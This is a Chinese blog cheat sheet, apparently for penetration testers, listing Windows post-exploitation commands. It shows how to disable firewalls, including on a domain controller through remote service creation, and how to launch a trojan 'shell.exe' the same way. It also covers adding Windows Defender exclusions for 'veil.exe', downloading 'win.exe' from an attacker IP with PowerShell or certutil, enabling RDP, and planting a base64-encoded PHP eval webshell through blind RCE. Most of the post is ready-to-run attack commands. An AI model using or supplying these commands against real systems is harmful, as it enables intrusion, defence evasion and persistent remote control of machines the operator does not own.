Windwos 命令备忘录
2022-04-03 21:05:51 #trick

netsh 关闭防火墙

netsh advfilewall set publicprofile state off
netsh advfirewall set allprofiles state off

netsh 端口转发

# 开启转发
netsh interface portproxy add v4tov4 listenaddress=LOCAL_ADDRESS listenport=LOCAL_PORT connectaddress=DEST_ADDRESS connectport=DEST_PORT

# 查看存在的转发
netsh interface portproxy show all

# 删除指定规则
netsh interface portproxy delete v4tov4 listenport=LOCAL_PORT listenaddress=LOCAL_ADDRESS

sc 创建服务

基本用法

sc create <SERVICE_NAME> binpath= "<COMMEND>"
sc description <SERVICE_NAME>   "DESCRIPTION" 设置服务的描述字符串 
sc config <SERVICE_NAME>   start= auto  设置这个服务为自动启动 
net start <SERVICE_NAME>   启动服务

可以通过 IPC 连接在远程主机上创建服务

# 关闭域控防火墙
sc \\\\DC create wall binpath= "netsh advfirewall set allprofiles state off"
sc \\\\DC start wall
# 执行木马
sc \\\\DC create shell binpath= "c:\\shell.exe"
sc \\\\DC start shell

开关 3389 端口

# 开启
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
# 关闭
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

开关 RDP

# 开启
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1
# 关闭
wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0

锁屏

Rundll32.exe user32.dll,LockWorkStation

certutil

certutil.exe -urlcache -split -f [URL] output.file

# base64解码
certutil.exe -decode encode.file decode.file

查询 defender 白名单路径

reg query "HKLM\SOFTWARE\Microsoft\windows Defender\Exclusions\Paths"

修改 defender 白名单

Add-MpPreference -ExclusionPath "C:\Utils" # 添加白名单路径
Add-MpPreference -ExclusionExtension "C:\Utils\veil.exe" # 添加白名单程序

PowerShell 下载远程文件

powershell (new-object Net.WebClient).DownloadFile('http://192.168.93.100:8000/win.exe','C:\win.exe')

替换文件中部分内容并写入到原文件

powershell ((cat C:\Users\administrator\Desktop\info.txt) -replace 'somethings', 'anothor things') | set-content -path C:\Users\administrator\Desktop\info.txt

PowerShell 中使用其他用户身份执行命令

$passwd = ConvertTo-SecureString "PASSWORD" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential ("DOMAIN\USERNAME", $passwd)

# 执行命令
Invoke-Command -computername localhost [-ConfigurationName dc_manage] -credential $cred -command {whoami}
Invoke-Command -ComputerName localhost -Credential $cred -ScriptBlock {whoami}

查找指定文件

递归查询 C 盘下 index.html 文件路径

dir /s /b c:\index.html

对无回显 RCE 的 web 机器可以通过配合该命令将命令执行结果写入到文件中,达到半回显效果

写入命令执行结果

for /f %i in ("dir /s /b c:\index.html") do (whoami > %i\..\whoami.txt)

写入一句话马

for /f %i in ('dir /s /b c:\1.jpg') do (echo PD9waHAgZXZhbCgkX1JFUVVFU1RbMV0pOyA/Pgo= > %i\..\base64.txt)
for /f %i in ('dir /s /b c:\base64.txt') do (certutil.exe -decode %i\..\base64.txt %i\..\1.php)
上一页
2022-04-03 21:05:51 #trick
下一页